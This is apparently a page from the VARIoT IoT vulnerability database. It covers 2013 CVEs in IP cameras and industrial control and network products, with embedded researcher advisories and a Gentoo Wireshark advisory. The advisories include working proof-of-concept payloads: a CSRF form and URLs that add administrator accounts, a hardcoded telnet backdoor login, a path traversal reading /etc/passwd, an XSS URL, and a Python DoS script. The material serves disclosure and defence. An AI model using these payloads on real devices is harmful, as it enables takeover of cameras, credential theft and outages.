VARIoT IoT vulnerabilities database
| VAR-201306-0316 | CVE-2013-3959 | Siemens SIMATIC WinCC/PCS 7 User Name Enumeration Vulnerability |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
The Web Navigator in Siemens WinCC before 7.2 Update 1, as used in SIMATIC PCS7 8.0 SP1 and earlier and other products, exhibits different behavior for NetBIOS user names depending on whether the user account exists, which allows remote authenticated users to enumerate account names via crafted URL parameters. Siemens SIMATIC WinCC is a supervisory control and data acquisition (SCADA) and human-machine interface (HMI) system. Siemens SIMATIC PCS is a process control system. Siemens SIMATIC WinCC and PCS 7 are prone to a username-enumeration weakness because of a design error in the application when verifying user-supplied input.
Attackers may exploit this weakness to discern valid usernames. This may aid brute-force password cracking or other attacks. There is a vulnerability in the Web Navigator in Siemens WinCC 7.2 Update 1 and earlier versions used in SIMATIC PCS7 8.0 SP1 and earlier versions and other products.
| VAR-201306-0158 | CVE-2013-3375 | Cisco Prime Central for Hosted Collaboration Solution Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the portal page in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCue23798.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCue23798. The platform provides functions such as secure access authentication and real-time fault analysis.
| VAR-201310-0207 | CVE-2013-3689 | Brickcom Multiple IP Cameras Information Disclosure Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.0.6.16C1 and earlier, do not properly restrict access to configfile.dump, which allows remote attackers to obtain sensitive information (user names, passwords, and configurations) via a get action. Brickcom IP Cameras are IP camera devices. Multiple Brickcom IP camera devices have security vulnerabilities that allow remote attackers to request the configuration file directly without authentication. Brickcom multiple IP cameras including FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, and OSD-040E are prone to an information-disclosure vulnerability.
Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Brickcom FB-100Ap and so on are network camera products of Brickcom. The vulnerability is caused by the program not properly restricting access to the configfile.dump file. The following network camera models are affected: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E.
============================================================================
BRICKCOM
====================================================================
============================================================================
1.Advisory Information
Title: Brickcom 100ap Series Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
Multiple vulnerabilities have been found in this device.
-CVE-2013-3689. Authentication Bypass Issues(CWE-592) and Clear Text Storage of Sensitive Information(CWE-312)
-CVE-2013-3690. Cross Site Request Forgery(CWE-352), Permissions, Privileges, and Access Control(CWE-264) and Execution with Unnecessary Privileges(CWE-250)
3.Affected Products
The following products are affected by these vulnerabilities:
FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E
It's possible other models are affected but they were not checked.
-CVE-2013-3689.
We have detected the following vulnerable firmwares: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1
In later firmware versions, you need to be logged in as administrator to download this file, but the information is still in plain text: firmwareVersion=v3.1.0.8, v3.1.0.4
-CVE-2013-3690.
All firmware checked.
4.PoC
4.1.Authentication Bypass & Clear Text Storage of Sensitive Information
CVE-2013-3689: this allows you to download the entire device configuration file by requesting the following URL (all data shown will be in plain text). No authentication is necessary.
_____________________________________________________________________________
http://xx.xx.xx.xx/configfile.dump?action=get
_____________________________________________________________________________
The most interesting parameters could be:
UserSetSetting.userList.users[nº].password= ***
UserSetSetting.userList.users[nº].name= ***
4.2.Cross Site Request Forgery (CSRF) + Privilege Escalation
CVE-2013-3690, CSRF is possible via POST method.
A privilege escalation from a viewer user to an administrator user is also possible.
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
The following request can exploit this vulnerability:
_____________________________________________________________________________
<html>
<body>
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST">
<input type="hidden" name="action" value="add">
<input type="hidden" name="index" value="0">
<input type="hidden" name="username" value="test2">
<input type="hidden" name="password" value="test2">
<input type="hidden" name="privilege" value="1">
<script>document.gobap.submit();</script>
</form>
</body>
</html>
_____________________________________________________________________________
5.Credits
-CVE-2013-3689 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3690 was discovered by Jonás Ropero Castillo.
6.Report Timeline
-2013-05-31: The student team notifies the Brickcom Customer Support of the vulnerabilities.
-2013-05-31: Brickcom answers saying that it agrees with some of the vulnerabilities, but that there are some it thinks are not correct.
(CVE-2013-3689, Authentication bypass and plain text information: After talking with the vendor, it looks like this bug is fixed after firmware 3.1.x.x, but the information is still shown in plain text, so they should fix this second one.)
-2013-06-03: Students check and communicate to Brickcom the details of the products and firmwares affected by the vulnerabilities.
-2013-06-04: The vendor agrees with everything stated and reports that it will fix it as soon as possible.
| VAR-201306-0336 | CVE-2013-4604 | Fortinet FortiOS running on FortiGate devices vulnerable to reading arbitrary user records |
CVSS V2: 6.5 CVSS V3: - Severity: MEDIUM |
Fortinet FortiOS before 5.0.3 on FortiGate devices does not properly restrict Guest capabilities, which allows remote authenticated users to read, modify, or delete the records of arbitrary users by leveraging the Guest role. FortiGate running FortiOS is prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.
Versions prior to FortiOS 5.0.3 are vulnerable. Fortinet FortiOS is a security operating system developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. FortiGate is a network security platform. The vulnerability comes from the fact that the program does not properly limit the Guest capabilities.
| VAR-201306-0159 | CVE-2013-3376 | Cisco Video Surveillance Operations Manager Open redirect vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Open redirect vulnerability in the help page in Cisco Video Surveillance Operations Manager allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka Bug ID CSCty74490.
An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible. This solution can provide secure configuration and management for web portal video, media server instances, cameras, etc. in the IP network.
| VAR-201310-0206 | CVE-2013-3688 | Multiple TP-Link IP Cameras denial-of-service (DoS) vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The TP-Link IP Cameras TL-SC3171, TL-SC3130, TL-SC3130G, TL-SC3171G, and possibly other models before beta firmware LM.1.6.18P12_sign6, do not properly restrict access to certain administrative functions, which allows remote attackers to (1) cause a denial of service (device reboot) via a request to cgi-bin/reboot or (2) cause a denial of service (reboot and reset to factory defaults) via a request to cgi-bin/hardfactorydefault. The TP-LINK TL-SC3171 is a network camera product. The TP-LINK TL-SC3171 has an authentication bypass vulnerability. An attacker could exploit this vulnerability to execute arbitrary commands, gain unauthorized access, and bypass security restrictions. TP-LINK TL-SC3171 IP camera is prone to an authentication-bypass vulnerability. Other attacks may also be possible.
The vulnerability is caused by the program not properly restricting access to administrator functions. The following models are affected: TL-SC3171, TL-SC3130, TL-SC3130G, TL-SC3171G.
| VAR-201310-0208 | CVE-2013-3690 | Multiple Brickcom products cross-site request forgery vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in cgi-bin/users.cgi in Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.1.0.8 and earlier, allows remote attackers to hijack the authentication of administrators for requests that add users. Brickcom IP Cameras are IP camera devices. A cross-site request forgery vulnerability exists in the Brickcom IP Cameras web interface. It allows an attacker to build a malicious URI and entice a user to open it, and it can be used to escalate user permissions.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected. Brickcom FB-100Ap and so on are network camera products of Brickcom. The following models are affected: FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E.
| VAR-201310-0247 | CVE-2013-3962 |
Multiple Grandstream products cross-site scripting vulnerability
Related entries in the VARIoT exploits database: VAR-E-201306-0196 |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Grandstream GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, GXV3500, and possibly other camera models before firmware 1.0.4.44, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. Unknown cross-site scripting vulnerabilities existed in multiple IP Cameras from Grandstream. Grandstream is an IP phone, network video surveillance solution vendor. The telnet service in multiple Grandstream products uses a built-in account that allows remote attackers to use this account to gain unauthorized access to factory reset or upgrade firmware. The affected products are as follows: GXV3500, GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3615WP_HD, GXV3651FHD, GXV3662HD.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Grandstream GXV3501 and others are network camera products of the American company Grandstream Networks (Grandstream).
===============================================================================
GRANDSTREAM
====================================================================
===============================================================================
1.Advisory Information
Title: Grandstream Series Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
The following vulnerability has been found in these devices:
-CVE-2013-3542. Backdoor in Telnet Protocol(CAPEC-443)
-CVE-2013-3962. Cross Site Scripting(CWE-79)
-CVE-2013-3963.
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963.
It's possible other models are affected but they were not checked.
4.PoC
4.1.Backdoor in Telnet Protocol
CVE-2013-3542, Backdoor in Telnet Protocol
You should connect via telnet protocol to any camera affected (it's open by default).
After that, you should enter the magic string “ !#/ ” as Username and as Password.
You will get the admin panel setting menu. If you type "help", the following commands are shown:
=======================================================
help, quit, status, restart, restore, upgrade, tty_test
=======================================================
@@@ restore (Reset settings to factory default)
The attacker can take control of the device, which makes these devices very vulnerable.
4.2.Cross Site Scripting (XSS)
CVE-2013-3962, Cross Site Scripting non-persistent.
_____________________________________________________________________________
http://xx.xx.xx.xx/<script>alert(123)</script>
_____________________________________________________________________________
4.3.Cross Site Request Forgery (CSRF)
CVE-2013-3963, CSRF via GET method.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
You should introduce the following URL to replicate the attack.
_____________________________________________________________________________
http://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0
_____________________________________________________________________________
5.Credits
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jonás Ropero Castillo.
6.Report Timeline
-2013-05-31: Students open a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3542.
-2013-05-31: Grandstream team reports to the technical support to analyze the vulnerability.
-2013-06-11: Students open a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3962 and CVE-2013-3963 vulnerabilities.
| VAR-201310-0248 | CVE-2013-3963 |
Multiple Grandstream products goform/usermanage vulnerable to cross-site request forgery
Related entries in the VARIoT exploits database: VAR-E-201306-0196 |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in goform/usermanage in Grandstream GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, GXV3500, and possibly other camera models allows remote attackers to hijack the authentication of unspecified victims for requests that add users. The telnet service in multiple Grandstream products uses a built-in account that allows remote attackers to use this account to gain unauthorized access to factory reset or upgrade firmware. Grandstream is an IP phone, network video surveillance solution vendor. There are cross-site request forgery vulnerabilities in the web interface of multiple Grandstream products, allowing attackers to build malicious URIs, entice logged-in users to open them, and perform malicious operations in the target user context, such as adding new users. The affected products are as follows: GXV3500, GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3615WP_HD, GXV3651FHD, GXV3662HD. Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. Grandstream GXV3501 and others are network camera products of American Grandstream Networks (Grandstream) company.
| VAR-201310-0243 | CVE-2013-3539 | Cross-site request forgery vulnerability in multiple Sony network camera products |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
The command/user.cgi component of multiple Sony network camera products contains a cross-site request forgery vulnerability. A third party could hijack the administrator's authentication and add users. Sony CH/DH Series IP Cameras are IP camera devices developed by Sony Corporation. The vulnerability allows an attacker to build a malicious URI, entice a user to open it, and perform malicious actions in the target user context, such as adding an administrator account.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
| VAR-201310-0249 | CVE-2013-3964 | Multiple Samsung SHR products cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Samsung SHR-5162, SHR-5082, and possibly other models, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. The Samsung SHR-5162/SHR-5082 is an IP camera. A cross-site scripting vulnerability exists in Samsung SHR-5162 and SHR-5082. It allows an attacker to build a malicious URI, entice a user to open it, and obtain sensitive information or hijack the user's session.
Note: Very limited information is currently available regarding this issue. We will update this BID as more information emerges.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
| VAR-201912-1573 | CVE-2013-3691 | AirLive POE-2600HD Vulnerable to resource exhaustion |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
AirLive POE-2600HD allows remote attackers to cause a denial of service (device reset) via a long URL. AirLive POE-2600HD contains a resource exhaustion vulnerability. Service operation may be interrupted (DoS). Airlive IP Camera is an IP camera device. Airlive IP camera is prone to a remote denial-of-service vulnerability.
| VAR-201912-1585 | CVE-2013-3542 |
Vulnerabilities related to the use of hard-coded credentials in multiple Grandstream product firmware
Related entries in the VARIoT exploits database: VAR-E-201306-0196 |
CVSS V2: 10.0 CVSS V3: 10.0 Severity: CRITICAL |
Grandstream GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, GXV3500, and possibly other camera models with firmware 1.0.4.11, have a hardcoded account "!#/" with the same password, which makes it easier for remote attackers to obtain access via a TELNET session. The firmware of multiple Grandstream products contains a vulnerability related to the use of hard-coded credentials. Information may be obtained or altered, and service operation may be disrupted (DoS). Grandstream is an IP phone, network video surveillance solution vendor. The affected products are as follows: GXV3500, GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3615WP_HD, GXV3651FHD, GXV3662HD. Grandstream multiple IP cameras including GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD, and GXV3500 are prone to multiple security-bypass vulnerabilities.
An attacker may exploit these issues to bypass certain security restrictions and perform unauthorized actions.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201308-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Wireshark: Multiple vulnerabilities
Date: August 28, 2013
Bugs: #398549, #427964, #431572, #433990, #470262, #472762, #478694
ID: 201308-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Wireshark, allowing remote
attackers to execute arbitrary code or cause Denial of Service.
Background
==========
Wireshark is a versatile network protocol analyzer.
Affected packages
=================
-------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------
  1  net-analyzer/wireshark       < 1.10.1               >= 1.10.1
                                                         *>= 1.8.9
Description
===========
Multiple vulnerabilities have been discovered in Wireshark. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could possibly execute arbitrary code with the
privileges of the process or cause a Denial of Service condition.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Wireshark 1.10 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.10.1"
All Wireshark 1.8 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.8.9"
References
==========
[ 1 ] CVE-2012-0041
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0041
[ 2 ] CVE-2012-0042
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0042
[ 3 ] CVE-2012-0043
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0043
[ 4 ] CVE-2012-0066
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0066
[ 5 ] CVE-2012-0067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0067
[ 6 ] CVE-2012-0068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0068
[ 7 ] CVE-2012-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3548
[ 8 ] CVE-2012-4048
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4048
[ 9 ] CVE-2012-4049
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4049
[ 10 ] CVE-2012-4285
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4285
[ 11 ] CVE-2012-4286
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4286
[ 12 ] CVE-2012-4287
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4287
[ 13 ] CVE-2012-4288
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4288
[ 14 ] CVE-2012-4289
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4289
[ 15 ] CVE-2012-4290
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4290
[ 16 ] CVE-2012-4291
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4291
[ 17 ] CVE-2012-4292
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4292
[ 18 ] CVE-2012-4293
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4293
[ 19 ] CVE-2012-4294
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4294
[ 20 ] CVE-2012-4295
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4295
[ 21 ] CVE-2012-4296
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4296
[ 22 ] CVE-2012-4297
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4297
[ 23 ] CVE-2012-4298
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4298
[ 24 ] CVE-2013-3540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3540
[ 25 ] CVE-2013-3541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3541
[ 26 ] CVE-2013-3542
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3542
[ 27 ] CVE-2013-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3555
[ 28 ] CVE-2013-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3556
[ 29 ] CVE-2013-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3557
[ 30 ] CVE-2013-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3558
[ 31 ] CVE-2013-3559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3559
[ 32 ] CVE-2013-4074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4074
[ 33 ] CVE-2013-4075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4075
[ 34 ] CVE-2013-4076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4076
[ 35 ] CVE-2013-4077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4077
[ 36 ] CVE-2013-4078
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4078
[ 37 ] CVE-2013-4079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4079
[ 38 ] CVE-2013-4080
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4080
[ 39 ] CVE-2013-4081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4081
[ 40 ] CVE-2013-4082
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4082
[ 41 ] CVE-2013-4083
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4083
[ 42 ] CVE-2013-4920
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4920
[ 43 ] CVE-2013-4921
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4921
[ 44 ] CVE-2013-4922
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4922
[ 45 ] CVE-2013-4923
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4923
[ 46 ] CVE-2013-4924
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4924
[ 47 ] CVE-2013-4925
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4925
[ 48 ] CVE-2013-4926
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4926
[ 49 ] CVE-2013-4927
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4927
[ 50 ] CVE-2013-4928
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4928
[ 51 ] CVE-2013-4929
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4929
[ 52 ] CVE-2013-4930
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4930
[ 53 ] CVE-2013-4931
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4931
[ 54 ] CVE-2013-4932
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4932
[ 55 ] CVE-2013-4933
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4933
[ 56 ] CVE-2013-4934
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4934
[ 57 ] CVE-2013-4935
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4935
[ 58 ] CVE-2013-4936
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4936
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201308-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201310-0205 | CVE-2013-3687 | plural AirLive Vulnerabilities in which important information is obtained in products |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
AirLive POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD, and possibly other camera models use cleartext to store sensitive information, which allows attackers to obtain passwords, user names, and other sensitive information by reading an unspecified backup file. Airlive IP Camera is an IP camera device. Multiple Airlive IP Cameras are prone to an information-disclosure vulnerability. Information obtained will aid in further attacks.
===========================================================================
AIRLIVE
====================================================================
===========================================================================
1.Advisory Information
Title: Airlive Multiple Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
Multiple vulnerabilities have been found in these devices:
-CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103)
-CVE-2013-3541. Relative Path Traversal(CWE-23).
-CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Privileges and Access Controls(CWE-264)
-CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312)
-CVE-2013-3691. Denial of Service
3.Affected Products
CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM
CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.
It's possible other models are affected but they were not checked.
4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator.
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
In the following example we will make a vector to create an alternative user with administration credentials.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=
_____________________________________________________________________________
4.2.Relative Path Traversal
CVE-2013-3541, Path Traversal that allows you to read file system configuration.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd
_____________________________________________________________________________
4.3.Sensitive Information Exposure + Privilege Escalation
CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID
_____________________________________________________________________________
We can decode Admin password (base64).
You can open with any text editor and look for user's information for example, passwords, users and so on.
4.5.Denial of Service (DoS)
Use CVE-2013-3691, DoS by overbuffing path '/'. A request with a large number of 'a' can take down the HTTP service of the camera device.
_____________________________________________________________________________
Request: http://xx.xx.xx.xx/[a*3000]
_____________________________________________________________________________
You will get the next message: Connection has been reset. After you remove the added characters and refresh, you will get the next message: Can't Connect
It will be down for around 2 min, but if we repeat the request again and again, every 1 min for example, the camera won't ever recover by itself.
The following Python script could be used to test the DoS:
_____________________________________________________________________________
@ request = 'GET /' + 'A' * 3000 + '.html HTTP/1.0\r\n'
@ s = socket.socket()
@ s.connect((cam_ip, 80))
@ s.send(request)
@ response = s.recv(1024)
@ s.close()
_____________________________________________________________________________
5.Credits
-CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo
-CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 were discovered by Jonás Ropero Castillo.
6.Report Timeline
-2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received.
-2013-06-03: Students ask for a reply.
-2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities
| VAR-201310-0244 | CVE-2013-3540 | plural AirLive Product cgi-bin/admin/usrgrp.cgi Vulnerable to cross-site request forgery |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in cgi-bin/admin/usrgrp.cgi in AirLive POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD, and possibly other camera models allows remote attackers to hijack the authentication of administrators for requests that add users. Airlive IP Camera is an IP camera device. An attacker can build a malicious URI and entice a logged-in user to open it; the request then runs in that user's context and can perform malicious operations such as adding an account.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks.
===========================================================================
AIRLIVE
====================================================================
===========================================================================
1.Advisory Information
Title: Airlive Multiple Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
Multiple vulnerabilities have been found in these devices:
-CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103)
-CVE-2013-3541. Relative Path Traversal(CWE-23).
-CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Privileges and Access Controls(CWE-264)
-CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312)
-CVE-2013-3691. Denial of Service
3.Affected Products
CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM
CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.
It's possible other models are affected but they were not checked.
4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator.
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
In the following example we will make a vector to create an alternative user with administration credentials.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=
_____________________________________________________________________________
4.2.Relative Path Traversal
CVE-2013-3541, Path Traversal that allows you to read file system configuration.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd
_____________________________________________________________________________
4.3.Sensitive Information Exposure + Privilege Escalation
CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID
_____________________________________________________________________________
We can decode Admin password (base64).
Now we can relogin like admin user and we have made the escalation privilege
4.4.Clear Text Storage of Sensitive Information
